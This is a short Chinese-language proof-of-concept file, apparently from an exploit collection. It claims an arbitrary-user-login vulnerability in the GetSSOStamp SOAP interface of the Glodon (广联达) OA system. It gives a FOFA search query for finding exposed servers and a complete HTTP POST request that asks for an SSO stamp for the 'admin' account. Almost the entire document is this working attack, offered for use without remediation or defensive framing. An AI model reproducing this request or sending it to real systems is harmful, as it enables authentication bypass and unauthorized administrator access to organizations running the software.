广联达OA系统GetSSOStamp接口存在任意用户登录.md

广联达OA系统GetSSOStamp接口存在任意用户登录

fofa

header="Services/Identification/login.ashx" || banner="Services/Identification/login.ashx"

poc

POST /WebService/Lk6SyncService/DirectToOthers/GetSSOStamp.asmx HTTP/1.1
Host:
Accept: */* Accept-Language: zh-CN,zh;q=0.9
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Content-Type: text/xml; charset=utf-8
Content-Length: 350
SOAPAction: "http://tempuri.org/GetStamp" 

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<GetStamp xmlns="http://tempuri.org/">
<usercode>
admin</usercode>
</GetStamp>
</soap:Body>
</soap:Envelope>